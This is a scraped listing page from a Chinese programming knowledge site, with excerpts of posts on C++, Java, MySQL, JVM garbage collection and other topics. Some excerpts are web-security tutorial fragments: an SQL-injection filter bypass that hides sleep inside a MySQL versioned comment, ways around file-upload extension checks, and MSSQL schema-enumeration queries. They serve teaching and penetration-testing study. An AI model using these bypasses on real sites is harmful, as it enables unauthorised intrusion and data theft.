<a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                        <div>继之前文章的补充:WEB安全--SQL注入--bypass技巧_sql注入过滤空格-CSDN博客Q1:发现sql注入的时间盲注时,如果时间盲注的函数都被过滤了,怎么办?除了找其他函数替换、编码等方式,还有以下方式绕过:1、尝试其他注入手段是否有效果,比如报错注入、DNSLog外带等;2、将被过滤的函数以拼接的方式呈现(如果正则验证不严格可能绕过):SELECT/*!50000sleep*/(5);</div>
                    </li>
                    <li><a href="/article/1928540144386764800.htm"
                           title="ZYNQ7020学习历程" target="_blank">ZYNQ7020学习历程</a>
                        <span class="text-muted">m0_61275923</span>
<a class="tag" taget="_blank" href="/search/%E5%AD%A6%E4%B9%A0/1.htm">学习</a><a class="tag" taget="_blank" href="/search/fpga%E5%BC%80%E5%8F%91/1.htm">fpga开发</a>
                        <div>一、介绍Zynq的全称是Zynq-7000AllProgrammableSoC,是它由一个双核ARMCortex-A9处理器和一个传统的现场可编程门阵列(FPGA)逻辑部件组成的。作为片上系统(SystemonChip,SOC),仅使用单个硅芯片即可实现整个系统的功能。Zynq是由两个主要部分组成的:一个是由双核ARMCortex-A9为核心构成的处理系统(PS,ProcessingSystem)</div>
                    </li>
                    <li><a href="/article/1927970622042861568.htm"
                           title="[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-7)逻辑漏洞相关面试题" target="_blank">[ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-7)逻辑漏洞相关面试题</a>
                        <span class="text-muted">寒蝉听雨[原ID_PowerShell]</span>
<a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E9%9D%A2%E8%AF%95%E5%88%86%E4%BA%AB/1.htm">渗透测试面试分享</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E5%AE%89%E9%9D%A2%E8%AF%95%E8%AF%A6%E8%A7%A3/1.htm">网安面试详解</a><a class="tag" taget="_blank" href="/search/%E9%9D%A2%E8%AF%95%E6%80%BB%E7%BB%93/1.htm">面试总结</a><a class="tag" taget="_blank" href="/search/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/1.htm">渗透测试</a><a class="tag" taget="_blank" href="/search/%E5%8D%87%E8%81%8C%E5%8A%A0%E8%96%AA/1.htm">升职加薪</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E9%9D%A2%E8%AF%95%E9%A2%98/1.htm">逻辑漏洞面试题</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E9%9D%A2%E8%AF%95%E9%A2%98/1.htm">网络安全面试题</a>
                        <div>博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!渗透方向的岗位,涉及到的知识点是很广泛的。这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的</div>
                    </li>
                    <li><a href="/article/1927878464082341888.htm"
                           title="简述C和C++的学习历程(转肖舸老师)" target="_blank">简述C和C++的学习历程(转肖舸老师)</a>
                        <span class="text-muted">读万卷书不如行万里路呀</span>
<a class="tag" taget="_blank" href="/search/VC/1.htm">VC</a><a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/mfc/1.htm">mfc</a><a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/%E8%AF%AD%E8%A8%80/1.htm">语言</a><a class="tag" taget="_blank" href="/search/api/1.htm">api</a>
                        <div>总是被同学们问到,如何学习C和C++才不茫然,才不是乱学,想了一下,这里给出一个总的回复。一家之言,欢迎拍砖哈。1、可以考虑先学习C。大多数时候,我们学习语言的目的,不是为了成为一个语言专家,而是希望成为一个解决问题的专家。做一个有用的程序员,做一个赚钱的程序员。我们的价值,将体现在客户价值上,而不是语言写得好不好看。C++是C的一个面向对象的解释,C++为C扩充了大规模工程应用,复杂的系统结构的</div>
                    </li>
                    <li><a href="/article/1927784514952687616.htm"
                           title="文件上传漏洞—服务端检测&绕过方法总结(持续更新)" target="_blank">文件上传漏洞—服务端检测&绕过方法总结(持续更新)</a>
                        <span class="text-muted">the zl</span>
<a class="tag" taget="_blank" href="/search/Web%E5%AE%89%E5%85%A8%E2%80%94%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/1.htm">Web安全—漏洞学习</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a>
                        <div>Web安全—文件上传漏洞文件上传漏洞简介和原理可参考Web安全—文件上传漏洞此篇文章,本文仅对服务端检测方法和绕过方法进行总结服务端检测方法&绕过方法:检测方法一:前端JS检测(通常为检测文件扩展名)绕过方法:1,禁止Web浏览器加载JS代码2,修改前端代码,添加需要上传的脚本语言扩展名3,Burpsuite抓包修改filename参数检测方法二:服务端MIME类型检测(检测POST内容的Cont</div>
                    </li>
                    <li><a href="/article/1927776200151855104.htm"
                           title="WEB安全--SQL注入--MSSQL注入" target="_blank">WEB安全--SQL注入--MSSQL注入</a>
                        <span class="text-muted">Neur0toxin</span>
<a class="tag" taget="_blank" href="/search/SQL%E6%B3%A8%E5%85%A5/1.htm">SQL注入</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a><a class="tag" taget="_blank" href="/search/sqlserver/1.htm">sqlserver</a>
                        <div>一、SQLsever知识点了解1.1、系统变量版本号:@@version用户名:USER、SYSTEM_USER库名:DB_NAME()SELECTnameFROMmaster..sysdatabases表名:SELECTnameFROMsysobjectsWHERExtype='U'字段名:SELECTnameFROMsyscolumnsWHEREid=OBJECT_ID('table')1.2</div>
                    </li>
                    <li><a href="/article/1927680119866978304.htm"
                           title="25.5.16(C++)" target="_blank">25.5.16(C++)</a>
                        <span class="text-muted">hhy_xyx</span>
<a class="tag" taget="_blank" href="/search/C%2B%2B%E5%AD%A6%E4%B9%A0/1.htm">C++学习</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>25.5.16(C++模板及相应知识学习)个人情况简介:本人目前大一,软件工程专业。目前自学C++已大半个月左右,为进一步提高学习效率,打牢语言基础,故从今日开始我的写博客之路,以此记录自己的学习历程。望共勉!函数模板的概念C++中的“模板”是什么?回顾过往学习生涯,不妨望文生义,其实“模板”就是一个可以“套用”的东西。那么在C++中,“模板”本质就是为了“套”代码,提高代码复用性。函数模板的基本</div>
                    </li>
                                <li><a href="/article/96.htm"
                                       title="怎么样才能成为专业的程序员?" target="_blank">怎么样才能成为专业的程序员?</a>
                                    <span class="text-muted">cocos2d-x小菜</span>
<a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B/1.htm">编程</a><a class="tag" taget="_blank" href="/search/PHP/1.htm">PHP</a>
                                    <div>  
如何要想成为一名专业的程序员?仅仅会写代码是不够的。从团队合作去解决问题到版本控制,你还得具备其他关键技能的工具包。当我们询问相关的专业开发人员,那些必备的关键技能都是什么的时候,下面是我们了解到的情况。 
  
关于如何学习代码,各种声音很多,然后很多人就被误导为成为专业开发人员懂得一门编程语言就够了?!呵呵,就像其他工作一样,光会一个技能那是远远不够的。如果你想要成为</div>
                                </li>
                                <li><a href="/article/223.htm"
                                       title="java web开发 高并发处理" target="_blank">java web开发 高并发处理</a>
                                    <span class="text-muted">BreakingBad</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/%E5%B9%B6%E5%8F%91/1.htm">并发</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91/1.htm">开发</a><a class="tag" taget="_blank" href="/search/%E5%A4%84%E7%90%86/1.htm">处理</a><a class="tag" taget="_blank" href="/search/%E9%AB%98/1.htm">高</a>
                                    <div>java处理高并发高负载类网站中数据库的设计方法(java教程,java处理大量数据,java高负载数据) 一:高并发高负载类网站关注点之数据库 没错,首先是数据库,这是大多数应用所面临的首个SPOF。尤其是Web2.0的应用,数据库的响应是首先要解决的。 一般来说MySQL是最常用的,可能最初是一个mysql主机,当数据增加到100万以上,那么,MySQL的效能急剧下降。常用的优化措施是M-S(</div>
                                </li>
                                <li><a href="/article/350.htm"
                                       title="mysql批量更新" target="_blank">mysql批量更新</a>
                                    <span class="text-muted">ekian</span>
<a class="tag" taget="_blank" href="/search/mysql/1.htm">mysql</a>
                                    <div>mysql更新优化: 
一版的更新的话都是采用update set的方式,但是如果需要批量更新的话,只能for循环的执行更新。或者采用executeBatch的方式,执行更新。无论哪种方式,性能都不见得多好。 
三千多条的更新,需要3分多钟。 
查询了批量更新的优化,有说replace into的方式,即: 
 
 
replace into tableName(id,status) values</div>
                                </li>
                                <li><a href="/article/477.htm"
                                       title="微软BI(3)" target="_blank">微软BI(3)</a>
                                    <span class="text-muted">18289753290</span>
<a class="tag" taget="_blank" href="/search/%E5%BE%AE%E8%BD%AFBI+SSIS/1.htm">微软BI SSIS</a>
                                    <div>1) 
Q:该列违反了完整性约束错误;已获得 OLE DB 记录。源:“Microsoft SQL Server Native Client 11.0” Hresult: 0x80004005 说明:“不能将值 NULL 插入列 'FZCHID',表 'JRB_EnterpriseCredit.dbo.QYFZCH';列不允许有 Null 值。INSERT 失败。”。 
A:一般这类问题的存在是 </div>
                                </li>
                                <li><a href="/article/604.htm"
                                       title="Java中的List" target="_blank">Java中的List</a>
                                    <span class="text-muted">g21121</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>        List是一个有序的 collection(也称为序列)。此接口的用户可以对列表中每个元素的插入位置进行精确地控制。用户可以根据元素的整数索引(在列表中的位置)访问元素,并搜索列表中的元素。 
        与 set 不同,列表通常允许重复</div>
                                </li>
                                <li><a href="/article/731.htm"
                                       title="读书笔记" target="_blank">读书笔记</a>
                                    <span class="text-muted">永夜-极光</span>
<a class="tag" taget="_blank" href="/search/%E8%AF%BB%E4%B9%A6%E7%AC%94%E8%AE%B0/1.htm">读书笔记</a>
                                    <div>   1.  K是一家加工厂,需要采购原材料,有A,B,C,D 4家供应商,其中A给出的价格最低,性价比最高,那么假如你是这家企业的采购经理,你会如何决策? 
    
     传统决策: A:100%订单  B,C,D:0% 
  
  &nbs</div>
                                </li>
                                <li><a href="/article/858.htm"
                                       title="centos 安装 Codeblocks" target="_blank">centos 安装 Codeblocks</a>
                                    <span class="text-muted">随便小屋</span>
<a class="tag" taget="_blank" href="/search/codeblocks/1.htm">codeblocks</a>
                                    <div>1.安装gcc,需要c和c++两部分,默认安装下,CentOS不安装编译器的,在终端输入以下命令即可yum install gccyum install gcc-c++ 
  
2.安装gtk2-devel,因为默认已经安装了正式产品需要的支持库,但是没有安装开发所需要的文档.yum install gtk2* 
3. 安装wxGTK 
   yum search w</div>
                                </li>
                                <li><a href="/article/985.htm"
                                       title="23种设计模式的形象比喻" target="_blank">23种设计模式的形象比喻</a>
                                    <span class="text-muted">aijuans</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>1、ABSTRACT FACTORY—追MM少不了请吃饭了,麦当劳的鸡翅和肯德基的鸡翅都是MM爱吃的东西,虽然口味有所不同,但不管你带MM去麦当劳或肯德基,只管向服务员说“来四个鸡翅”就行了。麦当劳和肯德基就是生产鸡翅的Factory    工厂模式:客户类和工厂类分开。消费者任何时候需要某种产品,只需向工厂请求即可。消费者无须修改就可以接纳新产品。缺点是当产品修改时,工厂类也要做相应的修改。如:</div>
                                </li>
                                <li><a href="/article/1112.htm"
                                       title="开发管理 CheckLists" target="_blank">开发管理 CheckLists</a>
                                    <span class="text-muted">aoyouzi</span>
<a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E7%AE%A1%E7%90%86+CheckLists/1.htm">开发管理 CheckLists</a>
                                    <div>开发管理 CheckLists(23) -使项目组度过完整的生命周期 
开发管理 CheckLists(22) -组织项目资源 
开发管理 CheckLists(21) -控制项目的范围开发管理 CheckLists(20) -项目利益相关者责任开发管理 CheckLists(19) -选择合适的团队成员开发管理 CheckLists(18) -敏捷开发 Scrum Master 工作开发管理 C</div>
                                </li>
                                <li><a href="/article/1239.htm"
                                       title="js实现切换" target="_blank">js实现切换</a>
                                    <span class="text-muted">百合不是茶</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/%E6%A0%8F%E7%9B%AE%E5%88%87%E6%8D%A2/1.htm">栏目切换</a>
                                    <div>js主要功能之一就是实现页面的特效,窗体的切换可以减少页面的大小,被门户网站大量应用思路: 
   1,先将要显示的设置为display:bisible  否则设为none
    2,设置栏目的id  ,js获取栏目的id,如果id为Null就设置为显示
    3,判断js获取的id名字;再设置是否显示
 
  
代码实现: 
  
html代码: 
  <di</div>
                                </li>
                                <li><a href="/article/1366.htm"
                                       title="周鸿祎在360新员工入职培训上的讲话" target="_blank">周鸿祎在360新员工入职培训上的讲话</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/%E6%84%9F%E6%82%9F/1.htm">感悟</a><a class="tag" taget="_blank" href="/search/%E9%A1%B9%E7%9B%AE%E7%AE%A1%E7%90%86/1.htm">项目管理</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E7%94%9F/1.htm">人生</a><a class="tag" taget="_blank" href="/search/%E8%81%8C%E5%9C%BA/1.htm">职场</a>
                                    <div>        这篇文章也是最近偶尔看到的,考虑到原博客发布者可能将其删除等原因,也更方便个人查找,特将原文拷贝再发布的。“学东西是为自己的,不要整天以混的姿态来跟公司博弈,就算是混,我觉得你要是能在混的时间里,收获一些别的有利于人生发展的东西,也是不错的,看你怎么把握了”,看了之后,对这句话记忆犹新。  &</div>
                                </li>
                                <li><a href="/article/1493.htm"
                                       title="前端Web开发的页面效果" target="_blank">前端Web开发的页面效果</a>
                                    <span class="text-muted">Bill_chen</span>
<a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/Web/1.htm">Web</a><a class="tag" taget="_blank" href="/search/Microsoft/1.htm">Microsoft</a>
                                    <div>1.IE6下png图片的透明显示: 
<img src="图片地址" border="0" style="Filter.Alpha(Opacity)=数值(100),style=数值(3)"/> 
或在<head></head>间加一段JS代码让透明png图片正常显示。 
 
2.<li>标</div>
                                </li>
                                <li><a href="/article/1620.htm"
                                       title="【JVM五】老年代垃圾回收:并发标记清理GC(CMS GC)" target="_blank">【JVM五】老年代垃圾回收:并发标记清理GC(CMS GC)</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/%E5%9E%83%E5%9C%BE%E5%9B%9E%E6%94%B6/1.htm">垃圾回收</a>
                                    <div>  CMS概述 
并发标记清理垃圾回收(Concurrent Mark and Sweep GC)算法的主要目标是在GC过程中,减少暂停用户线程的次数以及在不得不暂停用户线程的请夸功能,尽可能短的暂停用户线程的时间。这对于交互式应用,比如web应用来说,是非常重要的。 
  
CMS垃圾回收针对新生代和老年代采用不同的策略。相比同吞吐量垃圾回收,它要复杂的多。吞吐量垃圾回收在执</div>
                                </li>
                                <li><a href="/article/1747.htm"
                                       title="Struts2技术总结" target="_blank">Struts2技术总结</a>
                                    <span class="text-muted">白糖_</span>
<a class="tag" taget="_blank" href="/search/struts2/1.htm">struts2</a>
                                    <div>  
 
 必备jar文件 
   
 早在struts2.0.*的时候,struts2的必备jar包需要如下几个: 
commons-logging-*.jar   Apache旗下commons项目的log日志包 
freemarker-*.jar          </div>
                                </li>
                                <li><a href="/article/1874.htm"
                                       title="Jquery easyui layout应用注意事项" target="_blank">Jquery easyui layout应用注意事项</a>
                                    <span class="text-muted">bozch</span>
<a class="tag" taget="_blank" href="/search/jquery/1.htm">jquery</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a><a class="tag" taget="_blank" href="/search/easyui/1.htm">easyui</a><a class="tag" taget="_blank" href="/search/layout/1.htm">layout</a>
                                    <div>在jquery easyui中提供了easyui-layout布局,他的布局比较局限,类似java中GUI的border布局。下面对其使用注意事项作简要介绍: 
     如果在现有的工程中前台界面均应用了jquery easyui,那么在布局的时候最好应用jquery eaysui的layout布局,否则在表单页面(编辑、查看、添加等等)在不同的浏览器会出</div>
                                </li>
                                <li><a href="/article/2001.htm"
                                       title="java-拷贝特殊链表:有一个特殊的链表,其中每个节点不但有指向下一个节点的指针pNext,还有一个指向链表中任意节点的指针pRand,如何拷贝这个特殊链表?" target="_blank">java-拷贝特殊链表:有一个特殊的链表,其中每个节点不但有指向下一个节点的指针pNext,还有一个指向链表中任意节点的指针pRand,如何拷贝这个特殊链表?</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
public class CopySpecialLinkedList {

	/**
	 * 题目:有一个特殊的链表,其中每个节点不但有指向下一个节点的指针pNext,还有一个指向链表中任意节点的指针pRand,如何拷贝这个特殊链表?
拷贝pNext指针非常容易,所以题目的难点是如何拷贝pRand指针。
假设原来链表为A1 -> A2 ->... -> An,新拷贝</div>
                                </li>
                                <li><a href="/article/2128.htm"
                                       title="color" target="_blank">color</a>
                                    <span class="text-muted">Chen.H</span>
<a class="tag" taget="_blank" href="/search/JavaScript/1.htm">JavaScript</a><a class="tag" taget="_blank" href="/search/html/1.htm">html</a><a class="tag" taget="_blank" href="/search/css/1.htm">css</a>
                                    <div><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"  "http://www.w3.org/TR/html4/loose.dtd">    <HTML>    <HEAD>&nbs</div>
                                </li>
                                <li><a href="/article/2255.htm"
                                       title="[信息与战争]移动通讯与网络" target="_blank">[信息与战争]移动通讯与网络</a>
                                    <span class="text-muted">comsci</span>
<a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a>
                                    <div>      两个坚持:手机的电池必须可以取下来 
               光纤不能够入户,只能够到楼宇 
 
      建议大家找这本书看看:<&</div>
                                </li>
                                <li><a href="/article/2382.htm"
                                       title="oracle flashback query(闪回查询)" target="_blank">oracle flashback query(闪回查询)</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/flashback+query/1.htm">flashback query</a><a class="tag" taget="_blank" href="/search/flashback+table/1.htm">flashback table</a>
                                    <div>在Oracle 10g中,Flash back家族分为以下成员: 
Flashback Database 
Flashback Drop 
Flashback Table 
Flashback Query(分Flashback Query,Flashback Version Query,Flashback Transaction Query) 
下面介绍一下Flashback Drop 和Flas</div>
                                </li>
                                <li><a href="/article/2509.htm"
                                       title="zeus持久层DAO单元测试" target="_blank">zeus持久层DAO单元测试</a>
                                    <span class="text-muted">deng520159</span>
<a class="tag" taget="_blank" href="/search/%E5%8D%95%E5%85%83%E6%B5%8B%E8%AF%95/1.htm">单元测试</a>
                                    <div>zeus代码测试正紧张进行中,但由于工作比较忙,但速度比较慢.现在已经完成读写分离单元测试了,现在把几种情况单元测试的例子发出来,希望有人能进出意见,让它走下去. 
本文是zeus的dao单元测试: 
1.单元测试直接上代码 
  
package com.dengliang.zeus.webdemo.test;


import org.junit.Test;
import o</div>
                                </li>
                                <li><a href="/article/2636.htm"
                                       title="C语言学习三printf函数和scanf函数学习" target="_blank">C语言学习三printf函数和scanf函数学习</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/c/1.htm">c</a><a class="tag" taget="_blank" href="/search/printf/1.htm">printf</a><a class="tag" taget="_blank" href="/search/scanf/1.htm">scanf</a><a class="tag" taget="_blank" href="/search/language/1.htm">language</a>
                                    <div>printf函数 
/*
	2013年3月10日20:42:32
	地点:北京潘家园
	功能:
	目的:
		测试%x %X %#x %#X的用法
 */

# include <stdio.h>

int main(void)
{

	printf("哈哈!\n");  // \n表示换行

	int i = 10;
	printf</div>
                                </li>
                                <li><a href="/article/2763.htm"
                                       title="那你为什么小时候不好好读书?" target="_blank">那你为什么小时候不好好读书?</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/life/1.htm">life</a>
                                    <div>dady, 我今天捡到了十块钱, 不过我还给那个人了 
good girl! 那个人有没有和你讲thank you啊 
没有啦....他拉我的耳朵我才把钱还给他的, 他哪里会和我讲thank you 
  
爸爸, 如果地上有一张5块一张10块你拿哪一张呢.... 
当然是拿十块的咯... 
爸爸你很笨的, 你不会两张都拿 
  
爸爸为什么上个月那个人来跟你讨钱, 你告诉他没</div>
                                </li>
                                <li><a href="/article/2890.htm"
                                       title="iptables开放端口" target="_blank">iptables开放端口</a>
                                    <span class="text-muted">Fanyucai</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a><a class="tag" taget="_blank" href="/search/iptables/1.htm">iptables</a><a class="tag" taget="_blank" href="/search/%E7%AB%AF%E5%8F%A3/1.htm">端口</a>
                                    <div>1,找到配置文件 
vi /etc/sysconfig/iptables   
  
2,添加端口开放,增加一行,开放18081端口 
-A INPUT -m state --state NEW -m tcp -p tcp --dport 18081 -j ACCEPT 
  
3,保存 
ESC
:wq! 
  
4,重启服务 
service iptables </div>
                                </li>
                                <li><a href="/article/3017.htm"
                                       title="Ehcache(05)——缓存的查询" target="_blank">Ehcache(05)——缓存的查询</a>
                                    <span class="text-muted">234390216</span>
<a class="tag" taget="_blank" href="/search/%E6%8E%92%E5%BA%8F/1.htm">排序</a><a class="tag" taget="_blank" href="/search/ehcache/1.htm">ehcache</a><a class="tag" taget="_blank" href="/search/%E7%BB%9F%E8%AE%A1/1.htm">统计</a><a class="tag" taget="_blank" href="/search/query/1.htm">query</a>
                                    <div>缓存的查询 
目录 
1.    使Cache可查询 
1.1     基于Xml配置 
1.2     基于代码的配置 
2     指定可搜索的属性 
2.1     可查询属性类型 
2.2 &</div>
                                </li>
                                <li><a href="/article/3144.htm"
                                       title="通过hashset找到数组中重复的元素" target="_blank">通过hashset找到数组中重复的元素</a>
                                    <span class="text-muted">jackyrong</span>
<a class="tag" taget="_blank" href="/search/hashset/1.htm">hashset</a>
                                    <div>  如何在hashset中快速找到重复的元素呢?方法很多,下面是其中一个办法: 
 
 


 int[] array = {1,1,2,3,4,5,6,7,8,8};
         
        Set<Integer> set = new HashSet<Integer>();
         
        for(int i = 0</div>
                                </li>
                                <li><a href="/article/3271.htm"
                                       title="使用ajax和window.history.pushState无刷新改变页面内容和地址栏URL" target="_blank">使用ajax和window.history.pushState无刷新改变页面内容和地址栏URL</a>
                                    <span class="text-muted">lanrikey</span>
<a class="tag" taget="_blank" href="/search/history/1.htm">history</a>
                                    <div>后退时关闭当前页面 
<script type="text/javascript"> 
 jQuery(document).ready(function ($) { 
        if (window.history && window.history.pushState) {</div>
                                </li>
                                <li><a href="/article/3398.htm"
                                       title="应用程序的通信成本" target="_blank">应用程序的通信成本</a>
                                    <span class="text-muted">netkiller.github.com</span>
<a class="tag" taget="_blank" href="/search/%E8%99%9A%E6%8B%9F%E6%9C%BA/1.htm">虚拟机</a><a class="tag" taget="_blank" href="/search/%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8/1.htm">应用服务器</a><a class="tag" taget="_blank" href="/search/%E9%99%88%E6%99%AF%E5%B3%B0/1.htm">陈景峰</a><a class="tag" taget="_blank" href="/search/netkiller/1.htm">netkiller</a><a class="tag" taget="_blank" href="/search/neo/1.htm">neo</a>
                                    <div>应用程序的通信成本  
什么是通信 
一个程序中两个以上功能相互传递信号或数据叫做通信。  
什么是成本 
这是是指时间成本与空间成本。 时间就是传递数据所花费的时间。空间是指传递过程耗费容量大小。  
都有哪些通信方式 
 
 全局变量 
 线程间通信 
 共享内存 
 共享文件 
 管道 
 Socket 
 硬件(串口,USB) 等等 
  
全局变量 
全局变量是成本最低通信方法,通过设置</div>
                                </li>
                                <li><a href="/article/3525.htm"
                                       title="一维数组与二维数组的声明与定义" target="_blank">一维数组与二维数组的声明与定义</a>
                                    <span class="text-muted">恋洁e生</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%8C%E7%BB%B4%E6%95%B0%E7%BB%84/1.htm">二维数组</a><a class="tag" taget="_blank" href="/search/%E4%B8%80%E7%BB%B4%E6%95%B0%E7%BB%84/1.htm">一维数组</a><a class="tag" taget="_blank" href="/search/%E5%AE%9A%E4%B9%89/1.htm">定义</a><a class="tag" taget="_blank" href="/search/%E5%A3%B0%E6%98%8E/1.htm">声明</a><a class="tag" taget="_blank" href="/search/%E5%88%9D%E5%A7%8B%E5%8C%96/1.htm">初始化</a>
                                    <div>/**  *   */ package test20111005; /**  * @author FlyingFire  * @date:2011-11-18 上午04:33:36  * @author :代码整理  * @introduce :一维数组与二维数组的初始化  *summary:  */ public c</div>
                                </li>
                                <li><a href="/article/3652.htm"
                                       title="Spring Mybatis独立事务配置" target="_blank">Spring Mybatis独立事务配置</a>
                                    <span class="text-muted">toknowme</span>
<a class="tag" taget="_blank" href="/search/mybatis/1.htm">mybatis</a>
                                    <div>在项目中有很多地方会使用到独立事务,下面以获取主键为例      
(1)修改配置文件spring-mybatis.xml    <!-- 开启事务支持 -->    <tx:annotation-driven transaction-manager="transactionManager" />       &n</div>
                                </li>
                                <li><a href="/article/3779.htm"
                                       title="更新Anadroid SDK Tooks之后,Eclipse提示No update were found" target="_blank">更新Anadroid SDK Tooks之后,Eclipse提示No update were found</a>
                                    <span class="text-muted">xp9802</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a>
                                    <div>使用Android SDK Manager 更新了Anadroid SDK Tooks 之后, 
打开eclipse提示 This Android SDK requires Android Developer Toolkit version 23.0.0 or above, 点击Check for Updates  
检测一会后提示 No update were found  </div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类:</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>